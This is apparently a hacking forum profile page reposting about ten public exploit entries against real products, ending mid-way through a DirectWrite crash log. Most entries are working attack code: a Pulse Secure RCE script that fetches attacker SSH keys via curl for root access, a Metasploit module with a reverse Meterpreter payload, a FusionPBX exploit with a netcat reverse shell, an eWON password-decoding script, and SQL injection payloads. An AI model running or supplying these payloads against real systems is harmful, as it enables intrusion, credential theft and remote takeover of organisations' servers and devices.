Jump to content

HireHackking

Members

  • Joined

  • Last visited

View Profile Find content

Everything posted by HireHackking

  1. HireHackking

    Inventory Webapp - 'itemquery' SQL injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Inventory Webapp SQL injection # Data: 05.09.2019 # Exploit Author: mohammad zaheri # Vendor HomagePage: https://github.com/edlangley/inventory-webapp # Tested on: Windows # Google Dork: N/A ========= Vulnerable Page: ========= /php/add-item.php ========== Vulnerable Source: ========== Line39: $name = $_GET["name"]; Line39: $description = $_GET["description"]; Line39: $quantity = $_GET["quantity"]; Line39: $cat_id = $_GET["cat_id"]; Line49: if(mysql_query($itemquery, $conn)) ========= POC: ========= http://site.com/php/add-item.php?itemquery=[SQL] ========= Contact Me : ========= Telegram : @m_zhrii Email : neoboy503@gmail.com
  2. HireHackking

    Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # # Exploit Title: Pulse Secure Post-Auth Remote Code Execution # Google Dork: inurl:/dana-na/ filetype:cgi # Date: 09/05/2019 # Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_) # Vendor Homepage: https://pulsesecure.net # Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 # Tested on: linux # CVE : CVE-2019-11539 # # Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_) # # Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN # Downloads Modified SSH configuration and authorized_keys file to allow SSH as root. # You will need your own configuration and authorized_keys files. # # Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539 # Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html # # Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization. # We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free. # # Imports import requests import urllib from bs4 import BeautifulSoup # Host information host = '' # Host to exploit login_url = '/dana-na/auth/url_admin/login.cgi' # Login page CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code # Login Credentials user = 'admin' # Default Username password = 'password' # Default Password # Necessary for Curl downloadHost = '' # IP or FQDN for host running webserver port = '' # Port where web service is running. Needs to be a string, hence the quotes. # Proxy Configuration # Uncomment if you need to use a proxy or for debugging requests proxies = { # 'http': 'http://127.0.0.1:8080', # 'https': 'http://127.0.0.1:8080', } # Headers for requests headers = { 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36', 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language':'en-US,en;q=0.5', 'Accept-Encoding':'gzip, deflate', 'Content-Type':'application/x-www-form-urlencoded', } # Cookies to send with request cookies = { 'lastRealm':'Admin%20Users', 'DSSIGNIN':'url_admin', 'DSSignInURL':'/admin/', 'DSPERSISTMSG':'', } # Data for post request loginData = { 'tz_offset': 0, 'username': user, 'password': password, 'realm': 'Admin Users', 'btnSubmit': 'Sign In', } s = requests.Session() # Sets up the session s.proxies = proxies # Sets up the proxies # Disable Warnings from requests library requests.packages.urllib3.disable_warnings() # Administrator Login logic # Probably wouldn't have figured this out without help from @buffaloverflow def adminLogin(): global xsAuth global _headers # Send the intial request r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies) print('[#] Logging in...') # Self Explanatory r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request print('[#] Sent Login Request...') # Login Logic if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""): referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer r = s.get(referer, verify=False) # Sends a get request soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr print('[#] Grabbing xsauth...') xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token print('[!] Got xsauth: ' + xsAuth) # Self Explanatory data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page _headers = headers # Sets the headers _headers.update({'referer':referer}) # Updates the headers r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request print('[+] Logged in!') # Self Explanatory # Command injection logic def cmdInject(command): r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies) if r.status_code == 200: soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token payload = { 'a':'td', 'chkInternal':'On', 'optIFInternal':'int0', 'pmisc':'on', 'filter':'', 'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command, 'toggle':'Start+Sniffing', 'xsauth':xsAuth } # Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")} # print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run # Sends the get request to overwrite the template r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies) # Sends the get request to execute the code r = s.get('https://' + host + CommandExecURL, verify=False) # Main logic if __name__ == '__main__': adminLogin() try: print('[!] Starting Exploit') print('[*] Opening Firewall port...') cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port print('[*] Downloading Necessary Files....') cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys print('[*] Backing up Files...') cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys print('[*] Overwriting Old Files...') cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys print('[*] Restarting SSHD...') cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP print('[!] Done Exploiting the system.') print('[!] Please use the following command:') print('[!] ssh -p6667 root@%s') %(host) except Exception as e: raise
  3. HireHackking

    AwindInc SNMP Service - Command Injection (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::SNMPClient include Msf::Exploit::CmdStager def initialize(info={}) super(update_info(info, 'Name' => "AwindInc SNMP Service Command Injection", 'Description' => %q{ This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection. A valid SNMP read-write community is required to exploit this vulnerability. The following devices are known to be affected by this issue: * Crestron Airmedia AM-100 <= version 1.5.0.4 * Crestron Airmedia AM-101 <= version 2.5.0.12 * Awind WiPG-1600w <= version 2.0.1.8 * Awind WiPG-2000d <= version 2.1.6.2 * Barco wePresent 2000 <= version 2.1.5.7 * Newline Trucast 2 <= version 2.1.0.5 * Newline Trucast 3 <= version 2.1.3.7 }, 'License' => MSF_LICENSE, 'Author' => [ 'Quentin Kaiser <kaiserquentin[at]gmail.com>' ], 'References' => [ ['CVE', '2017-16709'], ['URL', 'https://github.com/QKaiser/awind-research'], ['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/'] ], 'DisclosureDate' => '2019-03-27', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_ARMLE], 'Privileged' => true, 'Targets' => [ ['Unix In-Memory', 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :unix_memory, 'Payload' => { 'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'} } ], ['Linux Dropper', 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'CmdStagerFlavor' => %w[wget], 'Type' => :linux_dropper ] ], 'DefaultTarget' => 1, 'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'})) register_options( [ OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']), ]) end def check begin connect_snmp sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s print_status("Target system is #{sys_description}") # AM-100 and AM-101 considered EOL, no fix so no need to check version. model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first case model when 'AM-100', 'AM-101' return CheckCode::Vulnerable else # TODO: insert description check for other vulnerable models (that I don't have) # In the meantime, we return 'safe'. return CheckCode::Safe end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end Exploit::CheckCode::Unknown end def inject_payload(cmd) begin connect_snmp varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd)) resp = snmp.set(varbind) if resp.error_status == :noError print_status("Injection successful") else print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'") end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end end def trigger begin connect_snmp varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1)) resp = snmp.set(varbind) if resp.error_status == :noError print_status("Trigger successful") else print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'") end rescue SNMP::RequestTimeout print_error("#{ip} SNMP request timeout.") rescue Rex::ConnectionError print_error("#{ip} Connection refused.") rescue SNMP::UnsupportedVersion print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.") rescue ::Interrupt raise $! rescue ::Exception => e print_error("Unknown error: #{e.class} #{e}") ensure disconnect_snmp end end def exploit case target['Type'] when :unix_memory execute_command(payload.encoded) when :linux_dropper execute_cmdstager end end def execute_command(cmd, opts = {}) # The payload must start with a valid FTP URI otherwise the injection point is not reached cmd = "ftp://1.1.1.1/$(#{cmd.to_s})" # When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback # We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and # keep our reverse shell opened :) cmd << "$(pkill -f /etc/reboot.sh)" # the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad cmd << "A" * (255-cmd.length) # we inject our payload in camFWUpgradeFTPURL print_status("Injecting payload") inject_payload(cmd) # we trigger the firmware download via FTP, which will end up calling this # "/bin/getRemoteURL.sh %s %s %s %d" print_status("Triggering call") trigger end end
  4. HireHackking

    WordPress Core 5.2.3 - Cross-Site Host Modification

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/perl -w # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Type: Remote # Risk: High # # Solution: # Set security headers to web server and no-cache for Cache-Control # # Simple Attack Scenarios: # # o This attack can bypass Simple WAF to access restricted content on the web server, # something like phpMyAdmin; # # o This attack can deface the vulnerable Wordpress website with content from the default vhost; # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # # ==================================================================================== # # Author: Todor Donev 2019 (c) <todor.donev at gmail.com> # # > Host => default-vhost.com # # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko) # # > Content-Type => application/x-www-form-urlencoded # # < Connection => close # # < Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Location => https://default-vhost.com/ # # < Server => nginx # # < Content-Type => text/html; charset=UTF-8 # # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT # # < Client-Peer => 13.37.13.37:443 # # < Client-Response-Num => 1 # # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3 # # < Client-SSL-Cert-Subject => /CN=default-vhost.com # # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384 # # < Client-SSL-Socket-Class => IO::Socket::SSL # # < Client-SSL-Warning => Peer certificate not verified # # < Client-Transfer-Encoding => chunked # # < Strict-Transport-Security => max-age=31536000; # # < X-Powered-By => PHP/7.3.9 # # < X-Redirect-By => WordPress # # ==================================================================================== # # # use strict; use v5.10; use HTTP::Request; use LWP::UserAgent; use WWW::UserAgent::Random; my $host = shift || ''; my $attacker = shift || 'default-vhost.com'; say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit # ==================================================================================== # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>"; if ($host !~ m/^http/){ say "# e.g. perl $0 https://target:port/ default-vhost.com"; exit; } my $user_agent = rand_ua("browsers"); my $browser = LWP::UserAgent->new( protocols_allowed => ['http', 'https'], ssl_opts => { verify_hostname => 0 } ); $browser->timeout(10); $browser->agent($user_agent); my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " "); $request->header("Host" => $attacker); my $response = $browser->request($request); say "# 401 Unauthorized!\n" and exit if ($response->code eq '401'); say "# > $_ => ", $request->header($_) for $request->header_field_names; say "# < $_ => ", $response->header($_) for $response->header_field_names; say "# ====================================================================================";
  5. HireHackking

    Publisure Hybrid - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    ##################################################################################### # Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain] # Google Dork: [N/A] # Date: [05/09/2019] # Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company] # Vendor Homepage: [https://www.publisure.com/] # Software Link: [N/C] # Version: [version 2.1.2] # Tested on: [Windows 7 Enterprise] # CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254] ##################################################################################### # Improper Access Control # # CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N) # OVE ID: OVE-20190724-0002 # CVE ID: CVE-2019-14253 # ##################################################################################### # (Pre-Authenticated) Multiples SQL injection # # CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N) # OVE ID: OVE-20190724-0003 # CVE ID: CVE-2019-14254 # ##################################################################################### # Unrestricted File Upload RCE # # CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) # OVE ID: OVE-20190724-0004 # CVE ID: CVE-2019-14252 # ##################################################################################### # Fixes: # Upgrade to latest product version and/or contact support for patches ##################################################################################### I. PRODUCT Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization. The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution. Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released. II. ADVISORY A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application. III. VULNERABILITIES DESCRIPTIONS a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted. b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions. Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example). c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form. This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file). IV. PROOF OF CONCEPT a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2) b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli "editUser.php" vulnerable code: $user = getUserDtails($_GET['id']); "userAccFunctions.php" vulnerable code example: function getUserDtails($id) { global $db; //The reseller_accounts table has been used to store department information since PDQit $Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id"; $R = $db->query($Q); return $R; } c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami) V. RECOMMENDATIONS a) Restrict access to administrative (and other) folder when non authenticated. b) Prepare SQL query before execution using PDO to escape injections. c) Check file type on file upload forms to prevent PHP code upload instead of templates. VI. TIMELINE July 23th, 2019: Vulnerability identification July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement August 13th, 2019: Contact to vendor to ask for fix - no reply September 04th, 2019: Vendor was informed 24h before public disclosure September 05th, 2019: public disclosure after 45 days VIII. LEGAL NOTICES The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this advisory. The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy
  6. HireHackking

    FusionPBX 4.4.8 - Remote Code Execution

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python3 ''' # Exploit Title: FusionPBX v4.4.8 Remote Code Execution # Date: 13/08/2019 # Exploit Author: Askar (@mohammadaskar2) # CVE : 2019-15029 # Vendor Homepage: https://www.fusionpbx.com # Software link: https://www.fusionpbx.com/download # Version: v4.4.8 # Tested on: Ubuntu 18.04 / PHP 7.2 ''' import requests from requests.packages.urllib3.exceptions import InsecureRequestWarning import sys import warnings from bs4 import BeautifulSoup # turn off BeautifulSoup and requests warnings warnings.filterwarnings("ignore", category=UserWarning, module='bs4') requests.packages.urllib3.disable_warnings(InsecureRequestWarning) if len(sys.argv) != 6: print(len(sys.argv)) print("[~] Usage : ./FusionPBX-exploit.py url username password ip port") print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337") exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] ip = sys.argv[4] port = sys.argv[5] request = requests.session() login_info = { "username": username, "password": password } login_request = request.post( url+"/core/user_settings/user_dashboard.php", login_info, verify=False ) if "Invalid Username and/or Password" not in login_request.text: print("[+] Logged in successfully") else: print("[+] Error with creds") service_edit_page = url + "/app/services/service_edit.php" services_page = url + "/app/services/services.php" payload_info = { # the service name you want to create "service_name":"PwnedService3", "service_type":"pid", "service_data":"1", # this value contains the payload , you can change it as you want "service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z", "service_cmd_stop":"stop", "service_description":"desc", "submit":"Save" } request.post(service_edit_page, payload_info, verify=False) html_page = request.get(services_page, verify=False) soup = BeautifulSoup(html_page.text, "lxml") for a in soup.find_all(href=True): if "PwnedService3" in a: sid = a["href"].split("=")[1] break service_page = url + "/app/services/services.php?id=" + sid + "&a=start" print("[+] Triggering the exploit , check your netcat !") request.get(service_page, verify=False)
  7. HireHackking

    eWON Flexy - Authentication Bypass

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/env python ''' # Exploit Title: eWON v13.0 Authentication Bypass # Date: 2018-10-12 # Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be # Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0 # [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability # Vendor Homepage: https://www.ewon.biz # Version: eWon Firmware 12.2 to 13.0 # Tested on: eWon Flexy with Firmware 13.0s0 Copyright 2019 Photubias(c) This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see <http://www.gnu.org/licenses/>. File name eWON-Flewy-Pwn.py written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be This script will perform retrieval of clear text credentials for an eWON Flexy router Tested on the eWON Flexy 201 with Firmware 13.0s0 Only requires a valid username (default = adm) and this user must have the Rights 'View IO' & 'Change Configuration' It combines two vulnerabilities: authentication bypass (fixed in 13.1s0) and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0) ''' username = 'adm' import urllib2,urllib,base64,binascii,os def decode(encpass): xorString = "6414FE6F4C964746900208FC9B3904963A2F61" def convertPass(password): if (len(password)/2) > 19: print('Error, password can not exceed 19 characters') exit() return hexxor(password, xorString[:len(password)]) def hexxor(a, b): return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)]) if encpass.startswith('#_'): encpass = encpass.split('_')[2] coded = base64.b64decode(encpass) codedhex = binascii.hexlify(coded)[:-4] clearpass = binascii.unhexlify(convertPass(codedhex)) print('Decoded password: ' + clearpass) def getUserData(userid, strIP): postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]' postwsdlist = postwsdlist.replace('|1','|'+str(userid)) postdata = {'wsdList' : postwsdlist} b64auth = base64.b64encode(username+':').replace('=','') result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read() resultarr = result.split('","') if len(resultarr) == 20: fname = str(resultarr[1]) lname = str(resultarr[2]) usern = str(resultarr[3]) if len(usern) == 0: return True encpassword = resultarr[4] print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ') decode(encpassword) print('---') return True else: return True strIP = raw_input('Please enter an IP [10.0.0.53]: ') if strIP == '': strIP = '10.0.0.53' print('---') for i in range(20): if not getUserData(i, strIP): print('### That\'s all folks ;-) ###') raw_input() exit(0) raw_input('All Done')
  8. HireHackking

    Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://www.dolibarr.org/ # Software Link: https://www.dolibarr.org/downloads # Version: 10.0.1 # Category: Webapps # Tested on: Xampp for Linux # Software Description : Dolibarr ERP & CRM is a modern and easy to use software package to manage your business... ================================================================== elemid (POST) - Sql injection PoC POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php Content-Type: application/x-www-form-urlencoded Content-Length: 143 Cookie: DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45 Connection: close Upgrade-Insecure-Requests: 1 token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi] Parameter: elemid (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT (ELT(7549=7549,1))),0x7176787a71)) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0 AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
  9. HireHackking

    Folder Lock 7.7.9 - Denial of Service

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit # Date: 12.09.2019 # Vendor Homepage:https://www.newsoftwares.net/folderlock/ # Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe # Exploit Author: Achilles # Tested Version: 7.7.9 # Tested on: Windows 7 x64 # 1.- Run python code :Folder_Lock.py # 2.- Open EVIL.txt and copy content to clipboard # 3.- Open Folderlock and Click 'Enter Key' # 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key' # 5.- Click 'Submit' and you will see a crash. #!/usr/bin/env python buffer = "\x41" * 6000 try: f=open("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(buffer) f.write(buffer) f.close() print "[+] File created!" except: print "File cannot be created"
  10. HireHackking

    Microsoft DirectWrite - Out-of-Bounds Read in sfac_GetSbitBitmap While Processing TTF Fonts

    HireHackking posted a blog entry in Hacker Technology
    Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++. Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded: --- cut --- (4368.698c): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] ds:000001b9`94823000=?? 0:036> u DWrite!sfac_GetSbitBitmap+0x2ad: 00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] 00007ffe`b1ce47c2 0811 or byte ptr [rcx],dl 00007ffe`b1ce47c4 49ffc5 inc r13 00007ffe`b1ce47c7 48ffc1 inc rcx 00007ffe`b1ce47ca 66413bc3 cmp ax,r11w 00007ffe`b1ce47ce 7471 je DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841) 00007ffe`b1ce47d0 66ffc0 inc ax 00007ffe`b1ce47d3 ebd1 jmp DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6) 0:036> k # Child-SP RetAddr Call Site 00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad 01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe 02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0 03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6 04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6 05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30 06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b 07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264 08 